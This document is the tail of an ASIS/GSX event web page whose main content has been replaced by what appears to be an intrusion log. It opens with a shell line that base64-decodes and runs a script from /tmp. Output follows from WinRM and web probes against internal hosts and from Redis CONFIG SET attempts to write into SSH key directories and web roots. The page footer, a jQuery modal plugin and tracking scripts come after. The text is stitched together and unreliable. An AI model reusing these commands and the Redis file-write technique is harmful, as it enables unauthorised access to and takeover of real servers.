cat /tmp/zwr1?? | base64 -d | tee /tmp/zrun.sh | true; sh /tmp/zrun.sh

BEGIN ==winrm== P %{http_code} auth=Kerberos http://10.11.20.31:5985/wsman P %{http_code} auth=Kerberos http://10.11.20.32:5985/wsman P %{http_code} auth=Kerberos http://10.11.20.35:5985/wsman ==more== H 404 196 Apache/2.4.52 (Ubuntu) files.asisonline.org https://10.11.20.115/ 404 Not F H 302 0 nginx store.asisonline.org http://10.11.20.75/magento_version H 302 0 nginx store.asisonline.org https://10.11.20.76/magento_version H 302 0 magento-test.asisonline.org http://10.11.20.108/magento_version ==dir== /root/.ssh -ERR CONFIG SET failed (possibly related to argument 'dir') - can't set protected config /home/ubuntu/.ssh -ERR CONFIG SET failed (possibly related to argument 'dir') - can't set protected config /var/www/html -ERR CONFIG SET failed (possibly related to argument 'dir') - can't set protected config /srv/www -ERR CONFIG SET failed (possibly related to argument 'dir') - can't set protected config BACK -ERR CONFIG SET failed (possibly related to argument 'dir') - can't set protected config ENDPY END END </section> </article> </main> </div><!-- .main-container --> <footer class="footer"> <div class="wrapper"> <div class="footer-social"> <a href="https://twitter.com/ASIS_Intl" target="_blank" rel="noreferrer noopener"><i class="fa-brands fa-x-twitter"></i></a> <a href="https://facebook.com/ASIS.GSX" target="_blank" rel="noreferrer noopener"><i class="fab fa-facebook-f"></i></a> <a href="https://www.linkedin.com/company/asis-international/" target="_blank" rel="noreferrer noopener"><i class="fab fa-linkedin-in"></i></a> <a href="https://www.youtube.com/user/ASISInternational" target="_blank" rel="noreferrer noopener"><i class="fab fa-youtube"></i></a> <a href="https://www.instagram.com/asisinternational/?hl=en" target="_blank" rel="noreferrer noopener"><i class="fab fa-instagram"></i></a> </div> <div class="footer-information"> <div> <p><b>GSX 2027</b><br>Orlando, FL<br>20 - 22 September</p> </div> <div> <p><b>GSX 2028</b><br>New Orleans, Louisiana<br>11 - 13 September</p> </div> <div> <p><b>GSX 2029</b><br>Denver, Colorado<br>24 - 26 September</p> </div> </div> <div class="footer-logo"> <div class="footer-asis"> Powered By <a href="https://www.asisonline.org/"><img src="https://www.gsx.org/wp-content/themes/gsx23-mdg/images/asis-logo.png" alt="ASIS International Logo"></a> </div> <div class="footer-fast"> <img src="https://www.gsx.org/wp-content/themes/gsx23-mdg/images/brand-fastest50-footer.png" alt="Fastest 50 Logo"> </div> </div> <nav class="footer-nav"> <div class="menu-footer-nav-container"><ul id="menu-footer-nav" class="menu"><li id="menu-item-8496" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8496"><a href="https://www.gsx.org/contact-us/">Contact Us</a></li> <li id="menu-item-8499" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8499"><a href="https://www.asisonline.org/footer-pages/privacy-policy/?_ga=2.67756305.1289052624.1618867572-978677238.1616025568">Privacy Policy</a></li> <li id="menu-item-8497" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8497"><a href="https://www.gsx.org/code-of-conduct/">Code of Conduct</a></li> <li id="menu-item-15752" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-15752"><a href="https://www.gsx.org/about/terms-conditions/">Show Policies</a></li> <li id="menu-item-11983" class="menu-item menu-item-type-post_type menu-item-object-page current_page_parent menu-item-11983"><a href="https://www.gsx.org/news-and-media/blog/">News & Media</a></li> </ul></div> </nav> <p class="footer-copyright">Copyright © 2026 ASIS International<br><br> <!-- OneTrust Cookies Settings button start --> <a class="optanon-toggle-display text-center">Cookie Settings</a> <!-- OneTrust Cookies Settings button end --></p> </div> </footer> <script type="speculationrules"> {"prefetch":[{"source":"document","where":{"and":[{"href_matches":"\/*"},{"not":{"href_matches":["\/wp-*.php","\/wp-admin\/*","\/wp-content\/uploads\/*","\/wp-content\/*","\/wp-content\/plugins\/*","\/wp-content\/themes\/gsx23-mdg\/*","\/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]} </script> <div class="gtranslate_wrapper" id="gt-wrapper-12250908"></div> <!-- MODAL JS --> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-modal/0.9.2/jquery.modal.min.js"></script> <script> /* A simple jQuery modal (http://github.com/kylefox/jquery-modal) Version 0.9.2 */ (function (factory) { // Making your jQuery plugin work better with npm tools // http://blog.npmjs.org/post/112712169830/making-your-jquery-plugin-work-better-with-npm if(typeof module === "object" && typeof module.exports === "object") { factory(require("jquery"), window, document); } else { factory(jQuery, window, document); } }(function($, window, document, undefined) { var modals = [], getCurrent = function() { return modals.length ? modals[modals.length - 1] : null; }, selectCurrent = function() { var i, selected = false; for (i=modals.length-1; i>=0; i--) { if (modals[i].$blocker) { modals[i].$blocker.toggleClass('current',!selected).toggleClass('behind',selected); selected = true; } } }; $.modal = function(el, options) { var remove, target; this.$body = $('body'); this.$html = $('html'); this.options = $.extend({}, $.modal.defaults, options); this.options.doFade = !isNaN(parseInt(this.options.fadeDuration, 10)); this.$blocker = null; if (this.options.closeExisting) while ($.modal.isActive()) $.modal.close(); // Close any open modals. modals.push(this); if (el.is('a')) { target = el.attr('href'); this.anchor = el; //Select element by id from href if (/^#/.test(target)) { this.$elm = $(target); if (this.$elm.length !== 1) return null; this.$body.append(this.$elm); this.open(); //AJAX } else { this.$elm = $('<div>'); this.$body.append(this.$elm); remove = function(event, modal) { modal.elm.remove(); }; this.showSpinner(); el.trigger($.modal.AJAX_SEND); $.get(target).done(function(html) { if (!$.modal.isActive()) return; el.trigger($.modal.AJAX_SUCCESS); var current = getCurrent(); current.$elm.empty().append(html).on($.modal.CLOSE, remove); current.hideSpinner(); current.open(); el.trigger($.modal.AJAX_COMPLETE); }).fail(function() { el.trigger($.modal.AJAX_FAIL); var current = getCurrent(); current.hideSpinner(); modals.pop(); // remove expected modal from the list el.trigger($.modal.AJAX_COMPLETE); }); } } else { this.$elm = el; this.anchor = el; this.$body.append(this.$elm); this.open(); } }; $.modal.prototype = { constructor: $.modal, open: function() { var m = this; this.block(); this.anchor.blur(); if(this.options.doFade) { setTimeout(function() { m.show(); }, this.options.fadeDuration * this.options.fadeDelay); } else { this.show(); } $(document).off('keydown.modal').on('keydown.modal', function(event) { var current = getCurrent(); if (event.which === 27 && current.options.escapeClose) current.close(); }); if (this.options.clickClose) this.$blocker.click(function(e) { if (e.target === this) $.modal.close(); }); }, close: function() { modals.pop(); this.unblock(); this.hide(); if (!$.modal.isActive()) $(document).off('keydown.modal'); }, block: function() { this.$elm.trigger($.modal.BEFORE_BLOCK, [this._ctx()]); this.$body.css('overflow','hidden'); this.$html.css('overflow','hidden'); this.$blocker = $('<div class="' + this.options.blockerClass + ' blocker current"></div>').appendTo(this.$body); selectCurrent(); if(this.options.doFade) { this.$blocker.css('opacity',0).animate({opacity: 1}, this.options.fadeDuration); } this.$elm.trigger($.modal.BLOCK, [this._ctx()]); }, unblock: function(now) { if (!now && this.options.doFade) this.$blocker.fadeOut(this.options.fadeDuration, this.unblock.bind(this,true)); else { this.$blocker.children().appendTo(this.$body); this.$blocker.remove(); this.$blocker = null; selectCurrent(); if (!$.modal.isActive()) this.$body.css('overflow',''); this.$html.css('overflow',''); } }, show: function() { this.$elm.trigger($.modal.BEFORE_OPEN, [this._ctx()]); if (this.options.showClose) { this.closeButton = $('<a href="#close-modal" rel="modal:close" class="close-modal ' + this.options.closeClass + '">' + this.options.closeText + '</a>'); this.$elm.append(this.closeButton); } this.$elm.addClass(this.options.modalClass).appendTo(this.$blocker); if(this.options.doFade) { this.$elm.css({opacity: 0, display: 'inline-block'}).animate({opacity: 1}, this.options.fadeDuration); } else { this.$elm.css('display', 'inline-block'); } this.$elm.trigger($.modal.OPEN, [this._ctx()]); }, hide: function() { this.$elm.trigger($.modal.BEFORE_CLOSE, [this._ctx()]); if (this.closeButton) this.closeButton.remove(); var _this = this; if(this.options.doFade) { this.$elm.fadeOut(this.options.fadeDuration, function () { _this.$elm.trigger($.modal.AFTER_CLOSE, [_this._ctx()]); }); } else { this.$elm.hide(0, function () { _this.$elm.trigger($.modal.AFTER_CLOSE, [_this._ctx()]); }); } this.$elm.trigger($.modal.CLOSE, [this._ctx()]); }, showSpinner: function() { if (!this.options.showSpinner) return; this.spinner = this.spinner || $('<div class="' + this.options.modalClass + '-spinner"></div>') .append(this.options.spinnerHtml); this.$body.append(this.spinner); this.spinner.show(); }, hideSpinner: function() { if (this.spinner) this.spinner.remove(); }, //Return context for custom events _ctx: function() { return { elm: this.$elm, $elm: this.$elm, $blocker: this.$blocker, options: this.options, $anchor: this.anchor }; } }; $.modal.close = function(event) { if (!$.modal.isActive()) return; if (event) event.preventDefault(); var current = getCurrent(); current.close(); return current.$elm; }; // Returns if there currently is an active modal $.modal.isActive = function () { return modals.length > 0; }; $.modal.getCurrent = getCurrent; $.modal.defaults = { closeExisting: true, escapeClose: true, clickClose: true, closeText: 'Close', closeClass: '', modalClass: "modal", blockerClass: "jquery-modal", spinnerHtml: '<div class="rect1"></div><div class="rect2"></div><div class="rect3"></div><div class="rect4"></div>', showSpinner: true, showClose: true, fadeDuration: null, // Number of milliseconds the fade animation takes. fadeDelay: 1.0 // Point during the overlay's fade-in that the modal begins to fade in (.5 = 50%, 1.5 = 150%, etc.) }; // Event constants $.modal.BEFORE_BLOCK = 'modal:before-block'; $.modal.BLOCK = 'modal:block'; $.modal.BEFORE_OPEN = 'modal:before-open'; $.modal.OPEN = 'modal:open'; $.modal.BEFORE_CLOSE = 'modal:before-close'; $.modal.CLOSE = 'modal:close'; $.modal.AFTER_CLOSE = 'modal:after-close'; $.modal.AJAX_SEND = 'modal:ajax:send'; $.modal.AJAX_SUCCESS = 'modal:ajax:success'; $.modal.AJAX_FAIL = 'modal:ajax:fail'; $.modal.AJAX_COMPLETE = 'modal:ajax:complete'; $.fn.modal = function(options){ if (this.length === 1) { new $.modal(this, options); } return this; }; // Automatically bind links with rel="modal:close" to, well, close the modal. $(document).on('click.modal', 'a[rel~="modal:close"]', $.modal.close); $(document).on('click.modal', 'a[rel~="modal:open"]', function(event) { event.preventDefault(); $(this).modal(); }); })); document.addEventListener('DOMContentLoaded', () => { // all modals $('a.modal-click, .modal-click > a, .modal-click a').each(function(modal){ var _this = $(this), id = _this.attr('href'); if(id){ _this.click(function(event){ event.preventDefault(); console.log('yyy ', id, id+'-modal'); jQuery(''+id+'-modal').modal({ fadeDuration: 1000, fadeDelay: 0.50, modalClass: "greyer", blockerClass: "modal-blue-ink", }); }); } }); // all modals }); </script> <link rel='stylesheet' id='countdown_css-css' href='https://www.gsx.org/wp-content/plugins/widget-countdown/includes/style/style.css?ver=6.8.2' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='https://www.gsx.org/wp-includes/css/dashicons.min.css?ver=6.8.2' type='text/css' media='all' /> <link rel='stylesheet' id='thickbox-css' href='https://www.gsx.org/wp-includes/js/thickbox/thickbox.css?ver=6.8.2' type='text/css' media='all' /> <script type="text/javascript" src="https://www.gsx.org/wp-content/plugins/accordion-blocks/js/accordion-blocks.min.js?ver=1.5.0" id="pb-accordion-blocks-frontend-script-js"></script> <script type="text/javascript" src="https://www.gsx.org/wp-content/plugins/ap-plugin-scripteo/frontend/js/bsa.carousel.js?ver=6.8.2" id="ap_plugin_carousel_js_script-js"></script> <script type="text/javascript" src="https://www.gsx.org/wp-content/plugins/responsive-accordion-and-collapse/js/accordion-custom.js?ver=6.8.2" id="call_ac-custom-js-front-js"></script> <script type="text/javascript" src="https://www.gsx.org/wp-content/plugins/responsive-accordion-and-collapse/js/accordion.js?ver=6.8.2" id="call_ac-js-front-js"></script> <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js?ver=5.0.0" id="bootstrap-bundle-js"></script> <script type="text/javascript" src="https://www.gsx.org/wp-content/themes/gsx23-mdg/js/main.js?ver=1783609251" id="main-js"></script> <script type="text/javascript" src="https://www.gsx.org/wp-content/themes/gsx23-mdg/js/gtm-external.js?ver=1678319584" id="gtm-external-js"></script> <script type="text/javascript" src="https://www.gsx.org/wp-content/plugins/widget-countdown/includes/javascript/front_end_js.js?ver=6.8.2" id="countdown-front-end-js"></script> <script type="text/javascript" id="gt_widget_script_12250908-js-before"> /* <![CDATA[ */ window.gtranslateSettings = /* document.write */ window.gtranslateSettings || {};window.gtranslateSettings['12250908'] = {"default_language":"en","languages":["af","sq","am","ar","hy","az","eu","be","bn","bs","bg","ca","ceb","ny","zh-CN","zh-TW","co","hr","cs","da","nl","en","eo","et","tl","fi","fr","fy","gl","ka","de","el","gu","ht","ha","haw","iw","hi","hmn","hu","is","ig","id","ga","it","ja","jw","kn","kk","km","ko","ku","ky","lo","la","lv","lt","lb","mk","mg","ms","ml","mt","mi","mr","mn","my","ne","no","ps","fa","pl","pt","pa","ro","ru","sm","gd","sr","st","sn","sd","si","sk","sl","so","es","su","sw","sv","tg","ta","te","th","tr","uk","ur","uz","vi","cy","xh","yi","yo","zu"],"url_structure":"none","flag_style":"3d","wrapper_selector":"#gt-wrapper-12250908","alt_flags":{"en":"usa"},"float_switcher_open_direction":"left","switcher_horizontal_position":"right","switcher_vertical_position":"bottom","custom_css":"#gt_float_wrapper{\r\n bottom: 70px !important;\r\n right: 10px !important;\r\n}","flags_location":"\/wp-content\/plugins\/gtranslate\/flags\/"}; /* ]]> */ </script><script src="https://www.gsx.org/wp-content/plugins/gtranslate/js/float.js?ver=6.8.2" data-no-optimize="1" data-no-minify="1" data-gt-orig-url="/gsx-blog/zzbwr1sh/" data-gt-orig-domain="www.gsx.org" data-gt-widget-id="12250908" defer></script> </div><!-- .site-container --> <!-- .ad code --> <!-- .ad code --> <!-- feathr testing via OneTrust --> <script type="text/plain" class="optanon-category-4"> !function(f,e,a,t,h,r){if(!f[h]){r=f[h]=function(){r.invoke? r.invoke.apply(r,arguments):r.queue.push(arguments)}, r.queue=[],r.loaded=1*new Date,r.version="1.0.0", f.FeathrBoomerang=r;var g=e.createElement(a), h=e.getElementsByTagName("head")[0]||e.getElementsByTagName("script")[0].parentNode; g.async=!0,g.src=t,h.appendChild(g)} }(window,document,"script","https://cdn.feathr.co/js/boomerang.min.js","feathr") feathr("fly", "58ac815b8e8027553bd8eafb"); feathr("sprinkle", "page_view"); </script> </body> </html> <!-- Performance optimized by Redis Object Cache. Learn more: https://wprediscache.com -->